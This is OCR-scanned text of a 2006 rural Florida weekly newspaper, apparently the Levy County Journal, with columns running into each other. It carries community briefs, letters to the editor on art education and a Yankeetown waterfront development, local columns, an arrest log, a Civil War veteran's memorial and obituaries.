school. Her career in education spans 34 years, with 20 years spent in Levy County schools. Asked what she found most chal- lenging about being a prin- cipal, she said, "meeting the demands and needs of all the students." And what is most rewarding for her? "The chil- dren and the successes." THURSDAY, NOVEMBER 16, 2006 News Briefs. Room in Bronson from 6-8 p.m. At this meeting, the presenter will be Donita Burke, Levy County's Learning Resource Specialist. The topic. Exceptional parents GOP meets Nov. 27 tomeet Nov. 16 The Levy County Repub- Also 50 boxes of food will give away free Thanksgiving The q ter meeg o lican Executive Committee be given to needy families, dinners on Tuesday, Nov. 21 the uery meeting l (REC)will hod its monthly RTegisfraion 'for these boxes from 6-9 p.m. th'e"Levy County Exceptional Registat for these boxes from 6-9 p.m. Student Parent Advisory meeting Monday, Nov. 27, at will be taken duringthe time ,The .church is. located at .Co n will tak ; .- if. -Bell's Restaurant,~i Chief- of our celebration and will be 1419 S.W. 2n" Court. o lfTs Nove p1et land starting l with 'eflow- distributed at the close of ur on Thursday, Nov. 16 at the stang distributed at the close of our Levy County School Board ship and dutch treat dinner at celebration. If you would like to help or participate in the music please contact Terrell Burge, Pastor BCC at 281-1624. 'Elohim to host dinner Elohim Praise, Worship and Deliverance of Chiefland will Page 3 1.4i 6:30. The REC meeting begins at 7:30. The REC website is www. levyrepublican.com. ,If you have any questions you may contact George at 486-0036. GOP to hear Scout history The history of the Girl Scouts, presented by the local troop, will be the program when the Yankeetown-Inglis Republican Club meets at 6 p.m. Tuesday, November 21 at the Inglis-Yankeetown Lions Club on 59th St., Yankeetown. Dinner will be served at 6:30 p.m. and the club is providing the Thanksgiving turkey. Please bring along whateveryou:vQwuld like with your turkey dinner to share. Alsobrjng& yourJ~able eting. Call Edith at 447-2622 or Scotty at 447-2895. di. Preventative and emergency veterinary care for all small animals and exotics .^BTTT W 1 a1~gT S2;, wt'lur .ch ieflandanimanlhospihal.conuW Log cabin next to Tire Mart *,_,' LWCOUNTY JOTRNAT HE COUNY PAPER S. I Quilters covered homeless children's heads BY WINNELLE HORNE put in an envelope with your name on it CORRESPONDENT and at the end of the show, we settle with Log Cabin Quilters met Nov. 9 at the Levy you. We will also have food each day. County Quilt Museum. Today .was show day. Monday we will be going to St. Francis Martha Asbell has finished a crocheted House with a.load of what have you. bedspread and what a beauty. It took her 10 About 80 stocking caps have been months to make and it goes to her daughter knitted for the homeless children. We Joann. Alice Mae has finished an umbrella. have socks, underwear and so. much girl quilt top. She has made so many quilts more. Sometime I say, but for the grace since she started with us in October 1983. of God that would be me. If you have quilts, crafts or what have you We had a chicken dinner, baked, potato please bring them in for us to hang. pie, dressing, soup, okra and tomatoes, Be sure you have a tag, at least a 2x3 with rice, salads, coconut pie, apple cake, your name, price or not for sale. .pound. dake,-and chocolate cake.' We had These tags have to be large enough for 20 present. people to see pnd please use a safety pin, no WinneellTorne is the.directbr of the straight pins or staples. Levy C6unty'Qi't Museii, Inc. We take care of all the sales. Your tog is : _^__ ^_'._, 1 . Chiefly nd fizz, Animai nospitai 127474 NW Hwy. 19, Chiefland 352-493-2000 Ak LEVY COUNTY JOURNAL OPINION THURSDAY, NOVEMBER 16, 2006 YOUR VIEW Our country needs art To the editor: With the recent midterm elections, we are all reminded of issues that divide us. I often think of a photograph of the earth taken from space. It reminds me that we all have common denominators from living on a same small planet. Some issues are non controversial. Almost everybody wants to breathe clean air and drink clean water. Education for our children. Health. Nourishment. Freedom of speech and religion. Most realize that the future of our small planet rests with our children. One issue that should be non controversial is art education in our schools. Art is essential to develop that child into a produc- tive adult. Art is a universal language. Art satisfies a basic need to create, to express and to demonstrate ideas. Art is a spoke in the wheel of progress. Art satisfies a basic need to create a nurturing environment. Art can express and develop the range of the human experience. Art can express values that are common to the human race. Art is integral in other disciplines such as law, medicine, en- gineering and history. Art can cross artificial borders and express common themes that all people on our small planet, no mater what language they speak, share. It is inconceivable, that our great country doesn't have art edu- cation in every school. David Leach Main Street Framing and Art Gallery, Chiefland 'We can work together' To the editor: I have to respond to the allegations made in your Nov. 2 issue by several letter writers regarding the Izaak Walton In- vestors development plans. I have made many presentations in Yankeetown in an attempt to provide accurate informa- tion on the project, and I will continue to do so throughout .the permitting process. Armed with the facts, we can work together on a smart plan for redeveloping the riverfront that can help the local economy while preserving and enhancing the quality of life in the community. Our by-right plans for these properties total about 180 units, as was accurately reported by the Levy County Jour- nal. I have talked to many people in Yankeetown who have come to review the development plans at several open houses and public meetings. I do not believe it is accurate to state that the citizens of Yankeetown are "against this development," or against redevelopment of the waterfront in general. The town council was elected on a platform to defend Yankeetown's zoning, and we've submitted plans that honor that directive.. Our project is centered around properties that are commercially zoned, and most are al- ready commercially developed. For the single residential ,. parcel, our "by-right" plans include lo\-densit) coristruc- tion of eight single-family residences on a five-acre parcel. Our plans include redeveloping the Izaak Walton Restaurant and three existing marinas. The remaining property, site of the Anchorage Boathouse and Preserve, is currently zoned commercial as a "Special Marina District," which allows for a dry rack storage facility. Regarding the scale of the development, none of the buildings along the Withlacoochee River will be higher than two stories over parking, or about the height of the exist- ing Izaak Walton Restaurant, which most residents will agree is not too high. The dry dock buildings on Cormorant Canal will be slightly higher, and the residential buildings in the Anchorage Boathouse and Preserve will be three stories over parking. Most of the resort residential units will include parking spaces under the buildings, with some additional on-site, street parking and off-site valet parking on land near the proposed package plant. The project will include retail stores and a restaurant, and most of our visi- tors will have no reason to drive anywhere once they arrive at our quiet retreat on the river. The Yankeetown waterfront has been developed for decades, and our redevelopment project will be constructed to the much.higher standards of 21st century environmental regulations. One of the main benefits will be a wastewater treatment "package plant" on the north side of County Road 40 constructed at no cost to the community. Construction of a central sewage system to protect the riv- / er from excess nutrients is a long-standing goal of the com- munity. In 1999, the Yankeetown Council voted to include a need for a central sewer system in the local comprehensive plan. According to town documents, "The need to replace on-site septic systems with a central wastewater treatment plant is self-evident: the potential negative impact of septic tank leachate on the Withlacoochee River an outstanding Florida Water, coastal resources in the Gulf of Mexico and groundwater." We agree, and that's why our package plant will be con- structed to allow it to tie in to a centralized sewage treatment Continued on page 5 "Copyrighted Material Syndicated Content Available from Commercial News Providers", Journalist let subjects tell their stories ne of my heroes died last week. As I watched tributes from his peers in broadcast journalism, I learned he was the hero of many. So often it seems that we as a culture confuse idols with heroes. Idols get lots of press attention these days. Just watch any morning news 'show to learn the latest on your favorite sports, movie or music star. That latest is usually an embarrassing moment captured by paparazzi and played repeatedly on TV. But stars are not . necessarily heroes, in spite of their sometimes breathtaking talent. Stars make more money in a year than we their fans make in a lifetime. When we'\dd'up the high-cost of tickets to, see thenmt_,s;ost of all the ads interrupting every televised moment we watch them, we realize how much we pay them from our hard-earned money. Their riches increase dramatically with each new movie release or season contract. When was the last time your favorite star inspired you to heroic action? I don't think mine ever have. So in spite of my impatience while waiting for the next movie or CD, I can't say my idols have led me to noble actions. Heroes dedicate their lives to helping others lead lives that are safer or happier or more free. I remember my childhood heroes. John Glenn. John Kennedy. Patrick Henry. My father, who went off on exotic voyages thanks to the U.S. Navy, and then returned months later with slides and tales from foreign ports. I began watching one of the first primetime news magazines in the 1980s. In the early years 60 Minutes brought together the best from the world of investigative journalism. Morley Safer, Mike Wallace, Andy Rooney, Diane Sawyer. All were good. No matter their subject matter, CASSIE JOURNIGAN each could Columnist hold their listeners spellbound. Ed Bradley was my favorite. It wasn't just the stories he presented, it was his way of interviewing. Whether he interviewed a cultural icon, a political mover and shaker or a man on death row, he accorded all respect. He listened more than he spoke, and when he did speak; he responded 'directly to what he had heard. Today I see so many news anchors and reporters jeer at those they are interviewing. They don't give their subject room to talk. They ask jaded questions. They cut off a response for the sake of argument. Or failing to listen, they let good stories slip by as they race down a list of prepared questions. These interviewing techniques have aroused animosity amongst the people. While to me journalism is a noble career, many view journalists as sleazy. Ed Bradley practiced the fine art ofjournalism. He shined a light on people's actions and let those he interviewed tell their own stories. He always seemed to capture the essence of his subjects. Our world is a better place today because of Bradley. He showed us how to find the inherent dignity of every human being. We can all hold our heads a little higher because that was how he treated us. I know I will miss him.. Cassie Journigan is a reporter with the Levy County Journal. She may be reached at cjournigan@levyjournal. corn Quote of the Week A lie can travel halfway around the world while the truth is putting on its shoes. Mark Twain (1835 1910) Letters to the Editor 1) Letters should be 500 words or less. Letters over the word limit may be edited for space and clar- ity. Letters longer than 500 words that are difficult to edit, may be considered for guest columns. 2) Letters must be signed and bear the signature of the author. Please include a daytime phone num- ber submitted for consideration. Mitss Honey says. Miss Honey says . COUNTY JOU HE COUNTY PAPER EST. 1 Staff Writers Cassie Journigan Neal Fisher Sales Representatve/Bronson Laura Catlow Typesetter Wilma Jean Asbell Delivery/Clerical Rhonda Griffiths unday, Nov. 12, 2006, 6 p.m. Good evening!. I went to Sunday morning service and came back home, looked through the Gainesville Sun and fed my little ones. Now they are all asleep and I am surrounded by love, yes puppy love. I feel like I need a nap, too, but ifI went to sleep now I wouldn't sleep tonight! I have some very good friends down at the yard sales at the Bronson Motel. Yes, they are lady friends! I baked a cake for them to eat while sitting there yesterday and then Margo and I ate at the Boondocks before we went home. Isn't it great to have friends and be loved? Later, OK'? Here I am again and its 1 a.m. Monday and I just had a cup of hot MISS HONEY chocolate and slipped on a sweater, No, I didn't turn on the heat! But I might soon if it gets too cool. It will soon be just that, because Thanksgiving and Christmas are on their way. Are you ready? Ready or not it's on its way! Yes, Old Tom Turkey is hiding and St. Nick is packing his bags! Have you been naughty or nice all year so as to be ahead of the game and not be left out? So until next time I'll say Lord fill my mouth with worthwhile stuff and nudge me Lord when I've said enough. Until next week be sweet, take care and God bless. So says, Miss Honey Page 4 I I Williston did it right There is an episode of the Andy Griffith Show where the townspeople want to have a band concert in the park for a leisurely Sunday afternoon. But instead of freestyling the afternoon, they waste it by too much planning, too many details. That episode ran through my mind Saturday evening as I stood in the pavil- ion at Lin- ear Park in Williston for the Vet-CAROLYN RISER erans Day celebra- tion. Instead of wasting time looking for bells and whis- tles, .the city put together a remarkable tribute to our nation's heroes-our vets-and the simpleness of the eve- ning stirred the heart. If there were anyone there who did not get a lump in their throat when the high school band played all the themes from Anchors Away to The Marines Hymn and the veterans stood for their branch, then that person had no heart. As I watched these veterans ranging from the very young to the very old, I thought of their sacrifice and that of their family. I am a mere 400 miles from my family arid can readily access them. Sometimes the distance seems like 4,00Q miles. I cannot imagine being the loved one of someone who is actually that far away or farther. Williston did everything correctly Saturday. The only decor was the American flag. The only uniforms were those worn by veterans and active service- men. There were no fancy trap- pings to-take away from the moment and the focus stayed where it should have-on the men and women who are still living and who fought to preserve our freedom of assembly. The music, the speakers the clear autumn sky were as if they were custom-ordered. It was a Mayberry night in a Florida setting. The town of Williston and Mayor Gerald Hethcoat are to be commended for taking the initiative to organize the event and for giving up their Saturday evening for those who were willing to give their lives for our country. . Saturday I was not only proud to be an American, I was proud of this Levy County city for its patrio- tism. Thank you. Thank you again. LEVY COUNTY JOURNAL AROUND LEVY COUNTY THURSDAY, NOVEMBER 16, 2006 Page 5 This Week's Arrests , The Williston Police Department reports the following arrests: A 16-year-old Williston boy charged Oct. 29 with resisting arrest. Derrick Levon Galloway, 27, of NE 38-" Place charged with driving while license suspended or revoked-habitual violator- and possession of cannabis, less than 20 grams. The Levy County Sheriff's Office reports the following arrests: Cory Patrick Robinson, 37, of Archer was arrested for possession L/T 20 marijuana, possession of crack cocaine, possession of ecstasy (MDMA). Bail was set at $42,500. Al Furnn Woods, 68 of Sanford was arrested for failure to appear (FTA); driving under the influence (DUI). No bond was set. Princeo. L. Altoidor, 17, of Chiefland was arrested for escape, battery on officer or firefighter, resisting without violence. Bail was set for $30,000. Anthony Hart, 17, of Palatka was arrested for escape, sniuggle contraband in facility, criminal mischief andresistingwithoutviolence. Bail was set at $10,000. Alan A. Webb, 19, of Chiefland was arrested for possession of cocaine, possession of less than 20 grams of marijuana and FTA for arraignment. No bond was set. He was also arrested for armed burglary, three counts of grand theft firearm, grand theft $300. Bail was set for $15,000. Shane A. Gray, 35, of Bronson was arrested for FTA worthless checks. Bond was set for $2,002. Alden Davis, 53, of Chiefland was arrested for grand theft. Bail was set for $2,500. Michael S. Nettles, 29, of Trenton was arrested for FTA, Possession ofmarijuana under 20 grams. Bail was set at $600. Jimmy Charles Ellingham, 47, of Cedar Key was arrested f or possession of crack cocaine, possession of drug paraphernalia and FTA- DWLSR. Bail was set for $11,000. Cynthia Glover Brown; 49, of Chiefland was arrested for sale of cocaine and possession of cocaine. Bail was set for $15,000. Catina Glover, 48, of Chiefland was arrested for sale of crack cocaine within 1000 feet of church and possession of crack cocaine. Bail was set at $15,000. Charles Lee Coon, 65, of Gainesville was arrested for FTA DWLS. He was released on his own recognizance. Jeremy Michael Savacool, 36, of Stuart was arrested for utter forged bills/check. Bail was set for $50,013. . Jeanette E. Thompson, 42, of Bronson was arrested for aggravated battery - domestic. Bail was set for $2,500. James H. Heintzelman, 36, of Williston was arrested for domestic battery. Bail was set for $3,500. John Theodore Creal, 41, of Bronson was arrested for lewd and lascivious molestation and fail to register as a sex offender. Bail was set for $35,000. Jonni Hill, 41 of Chiefland was arrested for violation of probation (VOP) - exploitation to the elderly. Bail was set for $3,027.78. Dale Monroe, 39, of Chiefland was arrested for VOP driving while license suspended or revoked (DWLSR). No bail was set. Lloyd Staley Ice, 54, of Spring Hill was arrested for VOP DUI. No -bond was set. Brian Douglas Larkin, 24, of Bronson was arrested for VOP vehicle theft. No bond was set. Farm Friends 4-H elects new officers BY JAMES CORBIN SPECIAL TO THE JOURNAL The Farm Friends 4-H Club met Monday, Nov. 6 to elect new officers for the year. Youngsters were excited to participate in the election process. Final results were: President: Kelsi Alexander, Vice-President: Justin Hiers, Secretary: Kinsey Ward, Reporter: James Corbin, Chaplain: Emily Smith. Members of the club each brought in items .to fill a basket which will be donated to a special family for the holidays. Students were proud to participate and gave generously, creating a wonderful basket a local family is sure to appreciate and enjoy. While it has not been decided which club member will show the club hog in the Suwannee River Fair, the enthusiasm of having a potential champion was shared by all. Each member is working diligently to prepare their animal or project for a good showing at the fair, and all are looking forward to describing their progress at next month's meeting. Wreck kills one Sunday A Fanning Springs man was killed Sunday when the motorcycle he was driving-crashed into a light pole and then a parked vehicle. According to the Florida Highway Patrol, Todd L. Harris, 24, was killed near US 19 and SR 26. Witnesses told the FHP that Harris had been driving his 1996 Yamaha erratically through Fanning Springs at approximately 100 mph. The report states that Harris veered his motorcycle off the east edge of the road, traveled along the shoulder for several hundred feet and then skidded sideways. Harris then struck a light pole, continued north and then struck the left side of an unoccupied 1994 Chevrolet pickup that was parked. Harris was transported to Shands UF where he was pronounced dead at 3:56 a.m. This marks the sixth fatal crash in Levy County in 2006. Bronson UMC plans holiday service munity to attend. For more information please call Pastor Chacon at 486-2281. forward to seeing the Izaak Walton Restaurant reopened, which is the first step in our plans. We are ready to reno- vate the restaurant immedi- ately, but we can't proceed until the town authorizes Levy County to proceed with issuing a building permit. We hope the town council will see the clear public ben- efit of new investment and the revival ofYankeetown as Continue frompage 4 a destination for visitors. We are embarking on a long process, and I hope everyone will agree that working to achieve a reason- able consensus on redevelop- ing Yankeetown's working waterfront is a goal that is in the best interests of everyone in the community. Peter Spittler, Member Izaak Walton Investors, LLC Quilter takes exception with definition To the editor: Re:"If it's quilted on a machine, it's a comforter" by Winelle Home The definition of quilt according to Webster's Dictionary: 'a bed coverlet of two layers of cloth filled with padding (as down or batting) held in place by ties or stitched designs'. The definition of comforter from the same source: 'a thick bed covering made of two layers of cloth containing a filling (as down).' Therefore: the significant difference be- tween a quilt and a comforter is thickness. Ms. Home presents a 'pur- ist' viewpoint about quilts. When sewing machines were first invented, those women who could afford one would piece and quilt (sew the lay- ers together) on their new machines to demonstrate the capabilities of those new sewing machines. Quilters no longer must raise their own cotton, take the seeds out by hand then comb, spin and weave their own fabric for their quilts. Quilters can simply go to the store and buy machine made fabric. The same is true regarding quilt making. Piecing can now be done on a sewing machine. Quilting can also be done by machine. The resulting product is still a quilt. I ask the purist: "Where do you get your cotton seed?" Michel Du Mont Longarm machine quilter Trenton (Levy) LEVY COUNTY HISTORY 107 Years Ago From the Levy County Clerk of Court Archives and History Dept. Minute Book 'H" -1897-1903 p. 185, Meeting of April, 1899 The official bond of John F. Jackson as Justice of the Peace in and for Justices Dist. No. 2 of Levy County in the sum of $500.00 with T. W. Shands & L. B. Lewis as sureties was approved also the bond of John R. Roberts for car- rying rifle in sum of 100.00 with W. J. Epperson, Wms. Nobles as sureties, was approved. On motion, it was ordered that a warrant for $1.48 in favor of Ben Freidman also a warrant for $26.50 in favor of H. I. Sutton be issued as Fine and Forfeiture Fund to pay bills which were ordered paid at last meeting of the Board. From the Archives and History Center Levy County Clerk's Office Danny J. Shipp, Clerk of Court Why Levy County? I really like the ruralness of it and there is enough here to keep me happy as far as stores and restaurants, etc. I love the peace and quiet, the ability to own horses and livestock, and the people who live here. I hate crowds and traffic jams and there aren't any-of those here! Did I mention that I love the peace and quiet? Why the newspaper? Because the help wanted ad was "blind," in that it did not reveal the company name, I had no idea who the employer was when I applied for this job. I have worked for many different kinds of busi- nesses and entities and had lots of office experience, so I applied for the job because of the experience they wanted and it ended up being this wonderful newspaper. What role do you feel the Levy County Journal plays in the community? I feel our role is important because this paper provides an unbiased account of what is happening in local government, as well as other community activities and happenings of interest to all age-groups of Levy Countians. We try to provide the facts and let readers draw their own conclusions, not tell you what we think you should feel. Some may feel that since we show both sides of an issue, we might be trying to change their view on something they don't like, but the fact is we are simply presenting both sides of a story as it has been presented to us. If we didn't do this, many people would be in the dark about what is going on in their city and county governments that will affect them positively or negatively. We also provide a very reasonable way for folks to advertise their busi- nesses and services. This paper is also the legal organ of Levy County, where we publish legal notices and advertisements that are of concern and interest to many. What is your favorite part of the Levy County Journal? I like different sections at different times; what- ever is of interest to me that week. One week, it might be Carolyn's opinion piece, or an editorial written by a concerned citizen. The next week it might be news about the Suwannee River Fair, or high school football. Though our paper could be viewed as "small" in comparison to others, it has a broad scope for its size. What do you like about living in Levy County? I love the beauty of the country, the peace, the quiet, the wildlife, the fact that this is still a farming/ranching community, the people, the gatherings and events. I love being able to look up at night and actually see millions of stars even the Milky Wayl I like the fact that you can go to a seafood festival one weekend, canoe on the Suwannee another, ride your horses, bike the trails, take in the Quilt Museum, eat at wonderful restaurants, plant a garden, go to church, take in a play, root for your favorite high school team, get sloppy with free watermelon...the list is endless. Or you can simply stay at home and be lazyl What is the biggest risk you have taken? I have never considered myself a risk-taker; I like the safety of sure things. But in looking back over my life I have found that I really have taken several risks after all and they were all big when I took them. The most recent one is that I chose to move up here to God's country and find a job that paid enough for me to survive, while my husband stayed and worked in Orlando until he could retire. I was fortunate to get a very good job with good pay and benefits, but after working in the job for a couple of months, I knew that the huge responsibility of it was too much for me to handle. I let my boss know about my decision (and my husband) and stayed for 4 more months and then searched for something else that would keep me afloat. I finally, and happily, landed here. What is the best advice you've been given? To place my trust in God to provide for me when I seem to have no means to provide for myself and then not to worry about anything. What are three things you tell people about yourself? I have a widely varied work experience: I used to be a long-distance truck driver and traveled all over the country and into Canada; I used to own and work in a florist shop in a little town in Tennessee, and I was fully trained as a surgical technician, among many other different jobs. What is: The last movie you've seen? Man of the Year with Robin Williams. The last book you read? Lincoln the Man by Edgar Lee Masters. I didn't finish it because it was a mod- erately difficult read and not my usual genre. It was written in 1931 about Abraham Lincoln by Mr. Masters, whose grandfather knew Lincoln, his family, friends and associates and lived where he had lived. Mr. Masters wrote an opposing view of Mr. Lincoln's life, both political and personal, than that which was made popular and elevated President Lincoln's memory to that of a demigod. I will try again to read this book. We only know what we are taught in school about certain subjects and those having to do with persons and subjects from more than a century before are usually things that we don't question. I have learned that, even though some- thing was taught to the masses, everything we are taught is not always strictly true! The one TV show you can't miss? The Young and the Restless. I know! I often wonder why I watch it myself. No one person could have as many problems of such horrific magnitude in their lives as all of the char- acters seem to have and not kill themselves! Some days I tell myself that I am fed up and will not watch it any more, but there I am the next day tuning in again! I am weak...WEAKI COUNTY JOUR COUNTY PAPER EST. 192 Save money and subscribe today. Call Robin at 490-4462 Meet the Press Robin Heath Office Manager Original Hometown:Orlando Bronson United Methodist Church will hold a Thanksgiving service on Wednesday, Nov. 22 at 7 p.m. Pastor Mario Chacon welcomes the com- YOUR VIEW 1 ment system further inland after one is constructed by either the county or the mu- nicipalities. I would suggest that this won't take 20 years, as one writer suggested, if Yankeetown's leaders make it a priority to protect the environment from the harm- ful effects of failing septic systems. Many of the residents we have spoken with are looking mmmmmmmlw LEVY COUNTY JOURNAL AROUND LEVY COUNTY THURSDAY, NOVEMBER 16, 2006 North, South honor Peterson for service during War Between the States BY CAROLYN RISNER MANAGING EDITOR Under an ancient cedar tree draped with Spanish moss, once warring! factions caine together Saturday to honor one of their O\11. Timoth\ Peterson, a veteran \\ho ser ed in the \ar Between the States on both sides, was memorialized at Sand Pond Cemetery in the Tidewater region of South Le\\ Country b\ re-enactors of the Sons of Confederate Veterans and Sons of Union Veterans. Peterson, born in Georgia in 1835, moed to Florida as a \oung man and married Celia Johnson. In 1 62. he enlisted in the 9"' Florida Infanrm, Compan\ A of the Confederate troops, and ser ed until, for unknown reasons, he \\as found dazed and \wandering in KeN West. In April 1864, he \was pressed into ser ice for the Union Arm\ and served with the 2" Florida Cal\an, Company A where he stayed until he was mustered out in Tallahassee in November 1865. It is recorded that Peterson participated in the Battles of F-t. Nl\ers and Cedar KeN during his sern ice, according to Terry Ho\e, a great-great- granddaughter. Peterson %%as also a recipient of the Distinguished Sen ice Award. Fifteen \ears later, Peterson married Sarah Jane Register and the family\ lied and prospered in the Tide\water region. The family. cemeterN at Sand Pond \\as begun in 1899 \ hen Peterson's mother-in-law Sarah Ann was buried there. Peterson was also interred there in 1914. Saturday nearly 100 people came from all across the state to pay their respects to the slider and his sen ice. During the half-hour ceremony a musket \ ith fixed ba \onet. a canteen with haversack and a knapsack, symbols of the army, were placed against Peterson's headstone. A breathh of evergreen, symbolizing und ing lo\e for the comrades of \ ar: a single red rose, a symbol of purity and a \reath of grapevines, representing v\ictore %ere then placed alongside the army symbols. After readings of "The Blue and the Gray" and "The Unknown Dead". an honor guard fired a 2 I-gun salute with muskets and cannon as the haunting refrain of"Taps" echoed in the distance. "Taps are sounded. Lights are out-the soldier sleeps," said Commander Ed Page of the Ocala Sons of Union Veterans. Also participating in the memorial sen ice were members of the Col. John Marshall Martin -Camp 730 of the Sons of Confederate Veterans. SYMBOLIC WREATHS were placed at the grave (1); a 21-gun salute pealed 'throughout the area (2); Great-great- granddaughter Terry Hoye spoke of her an- cestor's life (3); re-enac- tors stood watch during the ceremony (4). 1.---` Journal photos by Carolyn Risner PETERSON FAMILY matriarch, Eunita "Nita" Pe- terson Brass, accepts the flag on behalf of her Grandfather Timothy's service during the War Between the States. I1 I I 1 '. WOMEN DRESSED as war widows represented all the wives, mothers, sisters and fiancees of those who never returned from battle (5,6) while Clayton Nichols, front and Bill McClelland, ready the can- non (7). Page 6 .-Pot ek ;(d .,; JDJ l ~~~r 'I ' -- U '- A *1 J,t z,. " i. ~ 14 W A . ftkk V r r I a I~ 14S~y I' ~r gE~:.r I LEVY COUNTY JOURNAL Mary Ellis Bilbrey Mrs. Mary Ellis Bilbrey, 59, of Old Town died Saturday, Nov. 11, 2006 at North Florida Regional Hospital after a long illness. Born in Orlando, she moved to Old Town from Winter Garden in 1987. She was the first female licensed water well contractor in the state of Florida and currently one out of only two in the state. Bilbrey was a member of the Florida Ground Water Associ- ation and a member of the First Baptist Church of Old Town. She is survived by her son, Brian Bilbrey of Tampa; daugh- ter, Jennifer Storey of Old Town; sister, Patricia Pippin of Or- lando; brothers, Steven Ellis of Winter Garden, James E. Ellis Jr. of Portland, Maine and Martin Ellis of Altamonte Springs and grandchildren, Jay Tyler Storey and Jessica Storey. She was preceded in death by her husband Eddie Bilbrey. : Funeral services were held Nov. 14 at the Rick Gooding Funeral Home Chapel with the Rev. Royce Hanshew officiat- ing. Arrangements were under the care' of the Rick Gooding Funeral Home, Cross City. Freddy Davidson III Frederick R. "Freddy" Davidson III, 48, of St. Petersburg, died Nov. 9, 2006 at North Side Hospital. Born in Gainesville, he was the son of the late F.T. and Margery Davidson. An automotive mechanic, he was a member of First Baptist Church, Chiefland. He enjoyed hunting, fishing and the outdoors. He loved people, his family and friends and his hometown of Chiefland. Survivors include two sisters, Sandra Roberts of Chiefland and Vicki Wolford of York, S.C.; four aunts, Betty Turner of Augusta, Ga., Amelia Cannon and Mary Alice Hardee both of Chiefland, Madge Reid of Texas and several cousins. Funeral services were held Nov. 12 at Chiefland Cemetery. Arrangements were under the direction of Hiers-Baxley Funeral Services, Chiefland. Shirley Haven Eberle Shirley Haven Eberle, 69, of Port St. Lucie, died at home, Wednesday, Nov. 8, 2006. Born May 27, 1937, she was the daughter of the late Hugh I. and Eunice (Stapleton) Haven of Gainesville. She lived most of her life in Windsor, Conn.. Mrs. Eberle graduated from P.K. Yonge Laboratory School, Gainesville, in 1955 and attended the University of Florida. She was a member of the Hartford Audubon Society, a charter member of the Windsor Junior Women's Club and served on the town of Windsor Bicentennial Commission and the 350th Parade Committee and a former member of the Windsor Historical Society and the Civitan Club of Windsor. She also served on the board ofRIF (Reading is Fundamental) in Windsor. Survivors include a daughter, Karen Lynne Eberle and her husband, Peter E. Mousseau, and a son, Frederick J. Eberle and his wife, Robyn J. Wahl, all of Windsor, and her special SAVE GAS & CA$ I Printing Legal Forms NCR Forms Fax Copies Notary Greeting Cards Office Supplies Lamination PC Sales PC Repairs PC Parts t Ink Cartridges I- - - i - - - If We Don't Stock It... I$50.00 OFF Any New Computer We'll Ordert! Just Bring In This Ad To Redeem! : ------------- ----------1 310 Main Ave Bronson Mon-Fri 10-5 n the Rt Wite Blue Builing acars fom Petns BnkI David Renaud D.V. M. Kathy Bowker D.V. M. greater Chiiefland Ciamber of Commerce 2006 Business of tfe year * Affordable Quality Medicine & Surgery ' Convenient Appointments Available '5 Personal Compassionate Service *Morning Drop-off Office Hours Mon.- Fri. 8 am 6pm Sat. 9am 12 noon "ieAncgel" g~flllKMM-- OBITUARIES cousins, Carol and Terry Chaires of Wellington and many dear friends. A private memorial service will be held on the Gulf in Cedar Key at a later date. In lieu of flowers donations may be made to the American Cancer Society, 865 SE Monterey Commons Boulevard, Stuart, FL 34996. Yates Funeral Home, Port St. Lucie, was in.charge of the arrangements. Margaret Lee Fulmer Margaret Lee Fulmer, 39, of Alachua, died at home Friday, Nov. 3, 2006. She was born in Jersey City, N.J. and resided in Alachua for eight years. She was. a former beautician and enjoyed fishing. Her greatest joy in life was spending time with her daughter Brooke. She is survived by her daughter, Brooke of Gainesville, her ex-husband Thane Fulmer of Gainesville, her parents Richard and Carol Mudd of Bronson, her brother Edward Oliver, of High Springs, sister Debra Cooper of High Springs aunt Nina Sullivan, of Kansas City, Kan., uncle John and aunt Linda Sullivan of Trenton and Candace Shaw, who she counted as a dear friend and co-mother to her daughter. She also has numerous nieces and nephews. In lieu of flowers, donations may be made to Brooke Fulmer, c/o Debra Cooper, 243 SE Old Bellamy Road, High Springs, FL 32643. Mary Jobe Goddard Mary Jobe Goddard, 81, of Archer died Monday, Nov. 6, 2006 at her home surrounded by loved ones. A Paris, Tenn. native, she was born Oct 11, 1925. She was the daughter of the late Carl E. Cbmpton and Myrtle I. Compton. She was a Baptist and retired from Krispy Kreme. Survivors include two sisters, Barbara Lee of Paris, Tenn.; Kathy Hunter of Paris, Tenn.; one brother, Barry Compton of Lexington, Ky.; two sons, Norman A. Parrish of Gainesville, Charles Lynn Goddard of Bronson and daughter-in-law, Paula Goddard; two daughters: Janice Pinkston of Waldo and son- in-law, Wes Pinkston; Mary Beth Brown of Archer and son- in-law, Brian Brown; six grandchildren, John Alan Boone, Erikalynn Goddard, Katlin N. Brown, Nicole Lee, Julie Parrish and Chris Edwards. A private memorial was held at Haven Hospice Chapel. The family requests that expressions of sympathy be made as donations to E.T. York Hospice Care Center, 4200 NW 90th Blvd., Gainesville, FL 32606. Annie Laurie Grisham Annie Laurie Grisham, 82, of Jacksonville died Nov. 2, 2006 after a lengthy illness. She was born in Cedar Key on Sept. 14, 1924 and was a resident of Jacksonville since 1964. She retired from Riverside Hospital in 1966 with 26 years service as a nurse's assistant. She is survived by her husband, Edward Grisham of 61 years, a sister, Lucille Connell of Chiefland; a son, Mark Grisham of Jacksonville; two daughters; Diane Taylor of Cedar Key and Sharon Shannon of Jacksonville; five grandchildren and six great-grandchildren. She was a member of the Normandy.,Wjdof the Church of Jesus Christ of Latter-Day Saints. She loved music and dancing and danced with her husband on her 82nd birthday. Funeral services were held Nov. 7 at the Church of Jesus Christ of Latter-Day Saints in Jacksonville. A graveside service was held at Cedar Key Cemetery Nov. 8. Funeral arrangements were under the direction of Fraser Funeral Home. Fannie Eliza Holmes Fannie Eliza Holmes, 94, of Otter Creek died Nov. 6, 2006 at her residence. th-e IR kL -.. Nancy Bell Westhury Enrolled Agent Personal and Business Tax Returns Partnership & Corporate Tax Returns Computerized Monthly Accounting THURSDAY, NOVEMBER 16, 2006 Page 7 She was born in Ellzey and had been a lifelong resident of Levy County. She was a member of the Otter Creek Baptist Church where she served as a Sunday school teacher, clerk for the church and was in the choir. Her hobbies include sewing, gardening, reading and quilting. She was a homemaker. She was preceded in death by her husband, Buford H. Holmes and also grandsons Andrew and Wayne Butler. Her survivors include Donald and Mary Holmes ofBronson, Glyn and Pam Holmes of Chiefland, Mary Jonel Holmes of Otter Creek, Melba Tillis of Chiefland, Hilda Butler of Chiefland and sister in-law: Marie Meeks of Ellzey; 10 grandchildren and 19 great-grandchildren and many nieces and nephews. Funeral services were held at the Otter Creek Baptist Church with Pastors Billy and Gene Keith officiating. Interment was in Rosemary Cemetery in Bronson. In lieu of flowers, make contributions to Otter Creek Baptist Church building fund, P.O. Box 17, Otter Creek FL. 32683. Arrangements under the care of Hiers-Baxley 